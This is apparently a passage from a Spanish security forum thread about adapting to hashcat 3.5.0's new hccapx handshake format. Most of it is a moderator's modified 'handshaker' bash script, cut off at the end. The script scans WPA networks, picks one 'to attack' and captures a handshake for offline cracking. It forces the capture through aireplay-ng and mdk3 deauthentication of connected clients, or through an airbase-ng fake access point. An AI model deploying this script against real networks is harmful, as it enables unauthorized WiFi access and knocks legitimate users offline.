?>/script>'; } ?> hashcat 3.5.0 , pruebas y comentarios Widgets Magazine

Autor Tema: hashcat 3.5.0 , pruebas y comentarios  (Leído 12905 veces)

0 Usuarios y 1 Visitante están viendo este tema.

sol666

  • Visitante
hashcat 3.5.0 , pruebas y comentarios
« en: 23-04-2017, 02:49 (Domingo) »
@usuarionuevo
por no abrir un tema nuevo,creo que tendras que retocar el script del hashcat para un futuro proximo,al actualizar hashcat a la ultima version 3.5.0 aparte de tener que añadir el --force en una de las lineas ahora se ve que utiliza otro tipo de hccap

hashcat (v3.5.0) starting...

OpenCL Platform #1: Advanced Micro Devices, Inc.
================================================
* Device #1: Pitcairn, 1770/1970 MB allocatable, 20MCU
* Device #2: AMD FX-8320E Eight-Core Processor, skipped.

/run/media/root/wifislax64-1.0/root/Desktop/xxxxxxxx.cap.hccap: Old hccap format detected! You need to update: https://hashcat.net/q/hccapx

Started: Sun Apr 23 02:37:07 2017
Stopped: Sun Apr 23 02:37:08 2017
wifislax64 ~ #  
« Última modificación: 23-04-2017, 02:51 (Domingo) por sol666 »

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #1 en: 23-04-2017, 02:55 (Domingo) »
3.5.0 ---> que ahora te da el eror ese..y despues te dira donde esta mi driver

AMD GPUs on Linux require "AMDGPU-Pro Driver" (16.40 or later)


Yo no tengo problema hee ...que actualizo a 3.5.0 , quitamos el soporte a graficas AMD y yo mas contento que la ostia, por que ya me tiene amargao el temita del driver AMDGPU-PRO , que solo esta para "algunos linux", y solo "algunas versiones"  ..no es como antes que era un instalador, ahora son .deb para la version tal de ubuntu , y poco mas.
« Última modificación: 23-04-2017, 02:59 (Domingo) por USUARIONUEVO »

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #2 en: 23-04-2017, 04:27 (Domingo) »
estoy leyendo , que las versiones nuevas de aircrack , ya sacan el hccap a la version nueva...

asi que si aun tienes dudas..deberas capturar un handshake..o si aun tienes el fichero .cap ..y convertirlo , no usar un hccap viejo que ya tubieras.

de todas formas , despues te dira que el driver no vale  ;)..o eso creo.


coje tu .cap  y conviertelo con el escript que hay.
« Última modificación: 23-04-2017, 04:28 (Domingo) por USUARIONUEVO »

sol666

  • Visitante
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #3 en: 23-04-2017, 10:49 (Domingo) »
no,ya lo he probado,hasta he actualizado aircrack,a ver,el hashcat nuevo necesita hccapx y el script convierte .cap a .hccap sin x porque creo que utiliza aircrack para convertir..Para convertir creo que necesitamos un bin cap2hccapx.bin,que esta aqui

https://hashcat.net/cap2hccapx/

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #4 en: 23-04-2017, 20:09 (Domingo) »
por curiosidad , añadele una x al final del nombre ...creo se basa en la extension.

segun su ellos las versiones de aircrack svn , convierten ya  a hccapx , puede que solo necesite modificar el script de convertir para que añada la x al final del nombre.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #5 en: 23-04-2017, 20:16 (Domingo) »
toma ya ...  un handshake capturado con handshaker ....

Zero value timestamps detected in file: in/13617_1492971233.cap.

This prevents correct EAPOL-Key timeout calculation.

Do not use preprocess the capture file with tools such as wpaclean.



Creo que handshaker usa wpaclean ,para dejar el cap limpio ...y parece que no es buena idea para hashcat ...

Me veo retocando handshaker .... por que el autor original este desaparecido en combate desde hace iempo.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #6 en: 23-04-2017, 20:41 (Domingo) »
@sol666

por fa , prueba lo que te digo de añadirle la x al final del name a ver...

ya he modificado handshaker ,para que no pase el cap por wpaclean ... y he podido convertir online un cap a hccapx sin problemas.

falta saber si hashcat 3.5.0 aunque pide el driver AMDGPU-PRO , funciona con el "CATALYST"

sol666

  • Visitante
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #7 en: 23-04-2017, 21:30 (Domingo) »
añadiendole la x al hccap no funciona y si,añadiendole al script el --force funciona.Para convertir tendras que retocar el script y utilizar el cap2hccapx.bin creo,ya que aircrack parece que no lo hace,a mi me ha funcionado,te lo paso.

https://mega.nz/#!jVwmUBjZ!ySGyjAS0h4Ky8teBQm2Y98Ue7emo5zYHpCNb0z0dPnc

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
hashcat 3.5.0 , pruebas y comentarios
« Respuesta #8 en: 23-04-2017, 21:42 (Domingo) »
hashcat 3.5.0 funciona con catalyst ??

huys , le añadimos --force si es AMD , y a correr entonces, ¿no?

las hashcat-utils  las compile ayer ..las tengo en un txz , pero tendre que mirar mas cosas ... adaptar el script y tal.

si funciona, pues subire la version de hashcat ... 8)

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #9 en: 23-04-2017, 21:50 (Domingo) »
he dividido el tema..o no me cargao nada ...increible jajaja.

hablemos aqui de hashcat ...

lo primero es que me verifiques que catalyst con force sirve para la 3.5.0 ..y ya me meto a modificar cosas.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15985
Re: hashcat 3.5.0 , pruebas y comentarios
« Respuesta #10 en: 23-04-2017, 21:53 (Domingo) »
para empezar y despues de ver que no podia convertir el cap a hccapx ... he modificado handshaker para que omita el paso de limpiar con wpaclean el ahndshake.


handshaker es un script en bash , escrito originalmente por coeman76

Código: [Seleccionar]
# Si usted hace alguna modificación en esta aplicación,        
# deberá siempre mencionar al autor original de la misma.      
#                                                              
# Autor:Script creado por Coeman76                              
#                                                              
# Integra funciones del Brutus Hack WPA                        
# Funcion Seleccion tarjeta by kdctv                            
# Funcion Deteccion Mdk3 adaptada del Brutus Hack WPA          
# Funcion deteccion root adaptada del Brutus Hack WPA          
# Funcion Seleccion Red y Handshake Aireplay creadas por        
# Goyfilms y adaptadas al script por Coeman76                  


A lo que he añadido unas lineas explicando que he tocado y por que , que es muy poco , pero debe quedar registrado.

Código: [Seleccionar]
# Modificacion por USUARIONUEO @ www.seguridadwireless.net
# Comento todo lo relacionado a matar procesos ya que para
# capturar un handshake , no es necesario detenerlos ademas
# al acabar no los restaura , todo el codigo es el original.

# 23/04/2017 , se comenta la accion de pasar el cap por
# wpaclean , ya que despues hashcat se queja (no recomiendan
# pasar los cap por wpaclean y demas tools de limpieza)
# el cap sera solo movido a la ruta de destino.



Y respetando eso , os dejo el script que omite usar wpaclean.

Código: [Seleccionar]
#!/bin/bash

# Modificacion por USUARIONUEO @ www.seguridadwireless.net
# Comento todo lo relacionado a matar procesos ya que para
# capturar un handshake , no es necesario detenerlos ademas
# al acabar no los restaura , todo el codigo es el original.

# 23/04/2017 , se comenta la accion de pasar el cap por
# wpaclean , ya que despues hashcat se queja (no recomiendan
# pasar los cap por wpaclean y demas tools de limpieza)
# el cap sera solo movido a la ruta de destino.


#################################################################
#                                                               #
# # -*- ENCODING: UTF-8 -*-                                     #
# Este programa es software libre. Puede redistribuirlo y/o     #
# modificar-lo bajo los términos de la Licencia Pública General #
# de GNU según es publicada por la Free Software Foundation,    #
# bien de la versión 3 de dicha Licencia o bien (según su       #
# elección) de cualquier versión posterior.                     #
#                                                               #
# Si usted hace alguna modificación en esta aplicación,         #
# deberá siempre mencionar al autor original de la misma.       #
#                                                               #
# Autor:Script creado por Coeman76                              #
#                                                               #
# Integra funciones del Brutus Hack WPA                         #
# Funcion Seleccion tarjeta by kdctv                            #
# Funcion Deteccion Mdk3 adaptada del Brutus Hack WPA           #
# Funcion deteccion root adaptada del Brutus Hack WPA           #
# Funcion Seleccion Red y Handshake Aireplay creadas por        #
# Goyfilms y adaptadas al script por Coeman76                   #
#                                                               #
# Un saludo                                                     #
#                                                               #
#################################################################

blanco="\033[1;37m"
magenta="\033[0;35m"
rojo="\033[1;31m"
verde="\033[1;32m"
amarillo="\033[1;33m"
azul="\033[1;34m"
#############################################detecta mdk3 #######################################################

DETECTMDK3(){                                                                       
which mdk3 &> /dev/null                                                           
if [ $? -ne 0 ]; then 
echo ""
echo -e $rojo " El programa mdk3 no esta Instalado"
echo ""
echo -e $amarillo " Puedes elegir 1 de estos 3 Ataques:"                       
echo ""
echo -e $azul
echo "1) Aireplay-ng"
echo ""
echo "2) Honeypot"
echo ""
echo "3) Honeypot + Aireplay-ng"
echo -e $amarillo""
read -ep " Escoge una opcion : " P                                                 
case $P in
1)                                                     
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
sleep 2
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE1
;;
2)                                   
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT2
;;
3)                                   
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT
;;
esac
else
echo ""
echo -e $verde"   MDK3 esta Correctamente Instalado" 
echo -e $magenta "══════════════════════════════════════════════════"
sleep 1
fi
}
########################################## detectar root ###########################################################
FUNCROOT(){
W=$(whoami)
if [ "$W" == "root" ]; then
sleep 0.5
else
echo ""
echo " Necesitas loguearte como root para continuar..."
echo ""
exit
fi
}
################################################ Seleccion y Ataque Honeypot ##############################################
HONEYPOT(){
echo -e ""$amarillo
echo -e " Elige el tipo de encriptacion para el Honeypot"
echo -e ""
echo -e $azul"   1) WPA-TKIP"
echo -e "   2) WPA-CCMP"
echo -e "   3) WPA2-TKIP"
echo -e "   4) WPA2-CCMP"
echo -e $verde ""
read -ep " Entrar numero opción : " A
case $A in
1)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -z 2 -a $bssid $intmon &
;;
2)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -z 4 -a $bssid $intmon &
;;
3)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -Z 2 -a $bssid $intmon &
;;
4)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -Z 4 -a $bssid $intmon &
;;
*)
echo -e $rojo" ERROR: opción no valida"
HONEYPOT   
;;
esac
}
ATAQUEHONEYPOT(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE1
}
ATAQUEHONEYPOT1(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE2
}
ATAQUEHONEYPOT2(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE3
}
################################################ Mdk3 ##############################################################
MDK3(){
xterm -e mdk3 $intmon d $bssid &
mdk3pid=$!
sleep 10 && kill $mdk3pid &>/dev/null
if [ ! -e /proc/$mdk3pid ]; then
sleep 2
fi
}
####################################################Seleccionar la tarjeta###########################################
SELECT(){

iwconfig --version | grep "Recommend" | awk '{print $1}' > ./redes/iw.txt
airmon-ng | sed '3d' | awk '{print $2}' | sed '/^$/d' > ./redes/id.txt
cont=1
for j in `cat ./redes/iw.txt`
do
      var=`nl ./redes/id.txt | grep $cont | awk '{print $2}'`
      echo $j"       "$var
      let cont=cont+1
done > ./redes/iwi.txt
declare -a tarj_disp
  for i in "tarj_disp";
    do
    count=1               
      if [ "$i" == "tarj_disp" ]; then
         while read -r line; do
           tarj_disp[${count}]="$line"
            count=$((count+1))
         done < <( cat ./redes/iwi.txt )
      fi
done

ntarj=$(echo ${#tarj_disp[@]})
if [ -z "${ntarj}" ];
  then
  echo -e ""$rojo" ERROR:"$verde" No se detectó ninguna tarjeta inalambrica"
  echo ""
  sleep 2
  exit
else
  echo ""
  echo -e ""$verde"  Se han detectado las siguientes interfaces :"
  echo ""
  echo -e $magenta" ════════════════════════════════════════════════════════════"
    for i in ${!tarj_disp[*]}; do
       echo -e $amarillo"          $i)        ${tarj_disp[${i}]}      " 
    done
    if [ $ntarj -ge 1 ]; then
     echo -e $magenta" ════════════════════════════════════════════════════════════"$azul""
     echo ""
     read -p " Selecciona una Interfaz: " opt
       while [[ $opt < 1 ]] || [[ $opt > $ntarj ]]; do
         echo ""
         echo -e $rojo" ERROR!"$verde"...Opcion Invalida"
         echo ""
         echo -e $magenta" ════════════════════════════════════════════════════════════"$azul""
         echo ""
       read -p " Selecciona una Interfaz: " opt
    done
   fi
   
intrfaz=$(echo ${tarj_disp[${opt}]})
intrfz=`echo $intrfaz | awk '{print $1}'`
fi
}
####################################################Iniciar la tarjeta###############################################
START(){
ifconfig $intrfz down > /dev/null 2>&1
ifconfig $intrfz up > /dev/null 2>&1
iwconfig $intrfz rate 1M > /dev/null 2>&1
}
#################################################Poner en modo monitor################################################
MONITORUP(){
airmon-ng start $intrfz > /dev/null 2>&1
ifconfig mon0 > /dev/null 2>&1
echo ""
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo -e $verde"           Activando "$amarillo""$intrfz""$verde" en modo monitor"
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo ""
sleep 2
if [ $? = 0 ]; then
intmon=mon0
else
intmon=$intrfz
fi
}
##################################################Buscar redes######################################################
SEARCH(){
echo -e $verde "  Iniciando escaneo de redes..."$rojo"Ctrl + C detiene el proceso "
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo ""
sleep 2
xterm -e airodump-ng --encrypt WPA -w ./redes/Redes $intmon 
linap=`cat redes/Redes-01.csv | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'`
linap=`expr $linap - 1`
head -n $linap redes/Redes-01.csv &> redes/Redes.csv
tail -n +$linap redes/Redes-01.csv &> redes/clientes.csv
clear
lincsv=`wc -l redes/Redes.csv | awk '{print $1}'`
if [ $lincsv -le 3 ]; then
echo ""
echo -e $rojo
echo -e " No se encontró ninguna red...saliendo del script..."
echo ""
KILL
sleep 2
exit
fi
rm -rf redes/Redes.txt> /dev/null 2>&1
i=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY; do
caracteres_mac=${#MAC}
if [ $caracteres_mac -ge 17 ]; then
i=$(($i+1))
if [[ $POWER -lt 0 ]]; then
if [[ $POWER -eq -1 ]]; then
POWER=0
else
POWER=`expr $POWER + 100`
fi
fi
POWER=`echo $POWER | awk '{gsub(/ /,""); print}'` 
ESSID=`expr substr "$ESSID" 2 $IDLENGTH`
if [ $CHANNEL -gt 13 ] || [ $CHANNEL -lt 1 ]; then
CHANNEL=0
else
CHANNEL=`echo $CHANNEL | awk '{gsub(/ /,""); print}'`
fi
if [ "$ESSID" = "" ] || [ "$CHANNEL" = "-1" ]; then
ESSID="(Red Oculta)"
fi
echo -e "$MAC,$CHANNEL,$POWER,$ESSID" >> redes/Redes.txt
fi
done < redes/Redes.csv
sort -t "," -d -k 4 "redes/Redes.txt" > "redes/redes_wifi.txt"
}
################################################seleccionar red#####################################################
SELECTWIFI(){
clear
echo
echo -e  $azul"  Nº         BSSID       CANAL   PWR      ESSID"
echo -e  $magenta"  ══   ═════════════════ ═════  ═════ ═════════════""$verde"
echo ""
i=0
while IFS=, read MAC CANAL POTENCIA ESSID; do
i=$(($i+1))
if [ $i -le 9 ]; then
ESPACIO1=" "
else
ESPACIO1=""
fi
if [[ $CANAL -le 9 ]]; then
ESPACIO2=" "
if [[ $CANAL -eq 0 ]]; then
CANAL="-"
fi
else
ESPACIO2=""
fi
if [[ "$POTENCIA" = "" ]]; then
POTENCIA=0
fi
if [[ $POTENCIA -le 9 ]]; then
ESPACIO4=" "
else
ESPACIO4=""
fi
CLIENTE=`cat redes/clientes.csv | grep $MAC`
if [ "$CLIENTE" != "" ]; then
CLIENTE="*"
ESPACIO5=""
else
ESPACIO5=" "
fi
nombres_ap[$i]=$ESSID
canales[$i]=$CANAL
macs[$i]=$MAC
echo -e " $ESPACIO1$i)"$blanco"$CLIENTE"$amarillo"  $ESPACIO5$MAC "$verde"  $ESPACIO2$CANAL  "$amarillo"  $ESPACIO4$POTENCIA%  "$verde" $ESSID "
done < "redes/redes_wifi.txt"
echo
if [ $i -eq 1 ]; then
select=1
else
echo -e $verde "("$blanco"*"$verde") Red con Clientes"$azul""
echo ""
read -p " Selecciona la red a atacar : " select
fi
while [[ $select -lt 1 ]] || [[ $select -gt $i ]]; do
echo ""
echo -e $rojo " ERROR!"$verde" Opcion Incorrecta"$azul""
echo ""
read -p " Selecciona la red a atacar : " select
done
essid=${nombres_ap[$select]}
CANAL=${canales[$select]}
bssid=${macs[$select]}
bssidseparado=`echo $bssid | awk '{gsub(/:/,"-"); print}'`
echo ""
if [ "$essid" = "(Red Oculta)" ]; then
echo -e $rojo ""
echo -e " ERROR!: has seleccionado una red oculta..."
echo -e $amarillo""
sleep 1
echo -e " Saliendo del Script..."
KILL
exit
fi
}
########################################Capturar Trafico##########################################################
SNIFF(){
xterm -e airodump-ng --bssid $bssid -c $CANAL,$CANAL -w "redes/$essid ($bssidseparado)" $intmon &
}
SNIFF1(){
xterm -e airodump-ng --bssid $bssid -c $CANAL,$CANAL -w "redes/$essid ($bssidseparado)" mon1 &
}
############################################Tamaño y calculo Captura################################################
CALCULANUM(){
NUM=`ls -1 redes/"$essid ($bssidseparado)"-*.cap | wc -l`
if [ $NUM -lt 10 ]; then
CERO="0"
else
CERO=""
fi
}
#############################################CSV##################################################################
CSV(){
counter=1
ls redes/"$essid ($bssidseparado)"-01.csv > /dev/null 2>&1
while [ ! $? -eq 0 ]; do
echo -e ""$azul".\c"
sleep 0.2
counter=$((counter+1))
if [ $counter -gt 15 ]; then
counter=1
fi
ls redes/"$essid ($bssidseparado)"-01.csv > /dev/null 2>&1
done
echo -e "$amarillo\n"
}
########################################### Forzar Handshake Aireplay ##############################################
HANDSHAKE1(){
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
intervalo=20
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r${TAB} Buscando clientes...\c"
CONT=1
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Desautenticando cliente "$amarillo"$hay... \033[K"
xterm -e aireplay-ng -R --ignore-negative-one -0 5 -a $bssid -c $hay $intmon
CONT=$((CONT+1))
done
CONT=$intervalo
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ $CONT -eq 1 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
else
if [ $CONT -lt 10 ]
then
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
else
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
fi
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
sleep 1
CONT=$((CONT-1))
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
# wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
############################################# Forzar Handshake MDK3 ##################################################
HANDSHAKE2(){
intervalo=20
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r${TAB} Buscando clientes...\c"
CONT=1
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Lanzando ataque MDK3 a "$azul"$essid... \033[K""$verde"
echo ""
sleep 1
MDK3
CONT=$((CONT+1))
done
CONT=$intervalo
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ $CONT -eq 1 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
else
if [ $CONT -lt 10 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
else
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
fi
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
sleep 1
CONT=$((CONT-1))
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
#wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
####################################### Handshake Honeypot ###########################################################
HANDSHAKE3(){
intervalo2=300
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r Buscando clientes...\c"
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Lanzando Honeypot... \033[K""$verde"
CONT=$((CONT+1))
done
CONT=$intervalo2
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
#wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"   
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
###################################################Desactivar el modo monitor########################################
MONSTOP(){
intmons=`iwconfig --version | grep "Recommend" | awk '{print $1}' | grep mon`
let cuantas=`echo $intmons | wc -w`
let CONT=1
while [ $CONT -le $cuantas ]; do
MON=`echo $intmons| awk '{print $'$CONT'}'`
airmon-ng stop $MON > /dev/null 2>&1
let CONT=$CONT+1
done
}
#################################################Matar los procesos###################################################
KILL(){
#pids=`ps -A | grep -e xterm -e ifconfig -e dhcpcd -e dhclient -e NetworkManager -e wpa_supplicant -e udhcpc`
#while [ "$pids" != "" ]; do
#killall -q xterm ifconfig dhcpcd dhclient dhclient3 NetworkManager wpa_supplicant udhcpc > /dev/null 2>&1
#pids=`ps -A | grep -e xterm -e ifconfig -e dhcpcd -e dhclient -e NetworkManager -e wpa_supplicant -e udhcpc`
#done
MONSTOP
rm -fr ./redes > /dev/null 2>&1
mkdir redes > /dev/null 2>&1
}
###################################### PROGRAMA HANDSHAKER ##########################################################
FUNCROOT
KILL
clear
echo ""
echo ""
echo -e $amarillo"╔═════════════════════════════════════════════╗"
echo -e $amarillo"║  "$azul" Bienvenido a Handshaker "$blanco"v1.1"$azul" by Coeman76  "$amarillo"║"
echo -e "╚═════════════════════════════════════════════╝"
sleep 3
clear
SELECT
START
MONITORUP
SEARCH
SELECTWIFI
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
echo -e $amarillo" Escoge entre uno de los siguientes ataques"
echo ""
echo ""
echo -e $azul" 1) Aireplay-ng"
echo
echo " 2) MDK3"
echo
echo " 3) Honeypot"
echo
echo " 4) Honeypot + Aireplay-ng"
echo
echo " 5) Honeypot + MDK3"
echo ""
echo -e $amarillo""
read -p " Escoge una opcion : " OPC
echo ""
if [ "$OPC" = 1 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE1
elif [ "$OPC" = 2 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON MDK3"
echo -e $magenta "══════════════════════════════════════════════════"
DETECTMDK3
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE2
elif [ "$OPC" = 3 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT2
elif [ "$OPC" = 4 ]; then
echo ""
